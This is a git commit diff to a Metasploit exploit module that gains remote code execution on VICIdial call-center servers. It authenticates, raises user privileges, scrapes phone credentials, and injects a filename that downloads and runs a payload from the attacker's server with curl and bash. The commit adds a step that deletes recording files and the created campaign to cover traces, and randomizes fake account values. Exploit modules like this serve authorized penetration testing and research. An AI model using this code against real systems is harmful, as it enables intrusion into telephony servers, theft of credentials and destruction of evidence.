Randomize values + add function to delete campaign

Chocapikk · Chocapikk · commit f715cc68df87 · 2024-09-19T22:33:50.000+02:00
diff --git a/modules/exploits/unix/webapp/vicidial_agent_authenticated_rce.rb b/modules/exploits/unix/webapp/vicidial_agent_authenticated_rce.rb
@@ -22,7 +22,7 @@ def initialize(info = {})
           shell commands starting from an unauthenticated perspective.
         },
         'Author' => [
-          'Valentin Lobstein', # Metasploit Module
+          'Valentin Lobstein',              # Metasploit Module
           'Jaggar Henry of KoreLogic, Inc.' # Vulnerability Discovery
         ],
         'License' => MSF_LICENSE,
@@ -64,7 +64,7 @@ def initialize(info = {})
 
   def check
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, 'agc', 'vicidial.php'),
+      'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'vicidial.php'),
       'method' => 'GET'
     })
 
@@ -124,7 +124,10 @@ def exploit
     # Insert a malicious recording that contains the payload, using the agent session
     insert_malicious_recording(request_headers, session_name, session_id, recording_extension)
 
-    # Wait for the cron job to trigger the malicious payload and establish a connection
+    # Clean up by deleting the campaign created earlier
+    delete_dummy_campaign(target_uri, request_headers, fake_campaign_id)
+
+    # Start the cron job to execute the malicious payload, but don't block the script
     wait_for_cron_job
   end
 
@@ -134,13 +137,21 @@ def primer
   end
 
   def on_request_uri_payload(cli, request)
-    handle_request(cli, request, payload.encoded)
+    bash_command = <<-BASH
+  #!/bin/bash
+  cd /var/spool/asterisk/monitor/
+  find . -maxdepth 1 -type f -delete
+  #{payload.encoded}
+    BASH
+
+    handle_request(cli, request, bash_command)
   end
 
   def handle_request(cli, request, response_payload)
-    print_status("Received request at: #{request.uri}, Client Address: #{cli.peerhost}")
+    print_status("Received request at: #{request.uri} - Client Address: #{cli.peerhost}")
 
-    if request.uri == '/'
+    case request.uri
+    when '/'
       print_status("Sending response to #{cli.peerhost} for /")
       send_response(cli, response_payload)
     else
@@ -149,6 +160,19 @@ def handle_request(cli, request, response_payload)
     end
   end
 
+  def delete_dummy_campaign(target_uri, request_headers, campaign_id)
+    print_status("Deleting dummy campaign with ID: #{campaign_id}")
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri, 'vicidial', 'admin.php'),
+      'method' => 'GET',
+      'vars_get' => { 'ADD' => '61', 'campaign_id' => campaign_id, 'CoNfIrM' => 'YES' },
+      'headers' => request_headers
+    })
+
+    res&.code == 200 ? print_good("Campaign #{campaign_id} deleted successfully.") : print_error("Failed to delete campaign #{campaign_id}.")
+  end
+
   def authenticate_admin
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
@@ -169,19 +193,19 @@ def authenticate_admin
       'keep_cookies' => true
     )
 
-    unless res&.code == 200
-      fail_with(Failure::UnexpectedReply, 'Failed to authenticate with credentials. Maybe hashing is enabled?')
-    end
+    fail_with(Failure::UnexpectedReply, 'Failed to authenticate with credentials. Maybe hashing is enabled?') unless res&.code == 200
 
     print_good("Authenticated successfully as user '#{username}'")
     [target_uri, request_headers]
   end
 
   def update_user_settings(target_uri, request_headers)
+    faker = Faker::Internet
+
     user_settings_body = {
       'ADD' => '4A', 'custom_fields_modify' => '0', 'user' => datastore['USERNAME'], 'DB' => '0',
-      'pass' => datastore['PASSWORD'], 'force_change_password' => 'N', 'full_name' => 'KoreLogic',
-      'user_level' => '9', 'user_group' => 'ADMIN', 'phone_login' => 'KoreLogic', 'phone_pass' => 'KoreLogic',
+      'pass' => datastore['PASSWORD'], 'force_change_password' => 'N', 'full_name' => Faker::Name.name,
+      'user_level' => '9', 'user_group' => 'ADMIN', 'phone_login' => faker.username, 'phone_pass' => faker.password,
       'active' => 'Y', 'user_new_lead_limit' => '-1', 'agent_choose_ingroups' => '1',
       'agent_choose_blended' => '1', 'hotkeys_active' => '0', 'scheduled_callbacks' => '1',
       'agentonly_callbacks' => '0', 'next_dial_my_callbacks' => 'NOT_ACTIVE', 'agentcall_manual' => '0',
@@ -286,7 +310,7 @@ def create_dummy_campaign(target_uri, request_headers)
       'allow_closers' => 'Y',
       'hopper_level' => '1',
       'next_agent_call' => 'random',
-      'local_call_time' => '12am-11pm',
+      'local_call_time' => '12am-12am',
       'get_call_launch' => 'NONE',
       'SUBMIT' => 'SUBMIT'
     }
@@ -378,7 +402,7 @@ def fetch_phone_credentials(target_uri, request_headers)
     phone_password = res.get_html_document.at_css('input[name="pass"]')&.get_attribute('value')
     recording_extension = res.get_html_document.at_css('input[name="recording_exten"]')&.get_attribute('value')
 
-    if phone_extension && phone_password && recording_extension
+    if [phone_extension, phone_password, recording_extension].all?
       print_good("Found phone credentials: Extension=#{phone_extension}, Password=#{phone_password}, Recording Extension=#{recording_extension}")
     else
       fail_with(Failure::NotFound, 'Failed to retrieve one or more phone credentials from the page')
@@ -407,13 +431,15 @@ def agent_portal_authentication(request_headers, phone_extension, phone_password
     mgr_login_name = doc.at_css('input[name^="MGR_login"]')&.get_attribute('name')
     mgr_pass_name = doc.at_css('input[name^="MGR_pass"]')&.get_attribute('name')
 
-    if mgr_login_name.nil? || mgr_pass_name.nil?
-      today_date = Time.now.strftime('%Y%m%d')
-      mgr_login_name = "MGR_login#{today_date}"
-      mgr_pass_name = "MGR_pass#{today_date}"
-      print_status("Constructed dynamic field names manually: #{mgr_login_name}, #{mgr_pass_name}")
-    else
+    if mgr_login_name && mgr_pass_name
       print_good("Retrieved dynamic field names: #{mgr_login_name}, #{mgr_pass_name}")
+    else
+      begin
+        today_date = Time.now.strftime('%Y%m%d')
+        mgr_login_name = "MGR_login#{today_date}"
+        mgr_pass_name = "MGR_pass#{today_date}"
+        print_status("Constructed dynamic field names manually: #{mgr_login_name}, #{mgr_pass_name}")
+      end
     end
 
     manager_login_body = {
@@ -479,7 +505,6 @@ def insert_malicious_recording(request_headers, session_name, session_id, record
     uri = get_uri.gsub(%r{^https?://}, '').chomp('/')
     random_filename = ".#{Rex::Text.rand_text_alphanumeric(rand(3..5))}"
     malicious_filename = "$(curl$IFS-k$IFS@#{uri}$IFS-o$IFS#{random_filename}&&bash$IFS#{random_filename})"
-
     print_status("Generated malicious command: #{malicious_filename}")
 
     record1_body = {
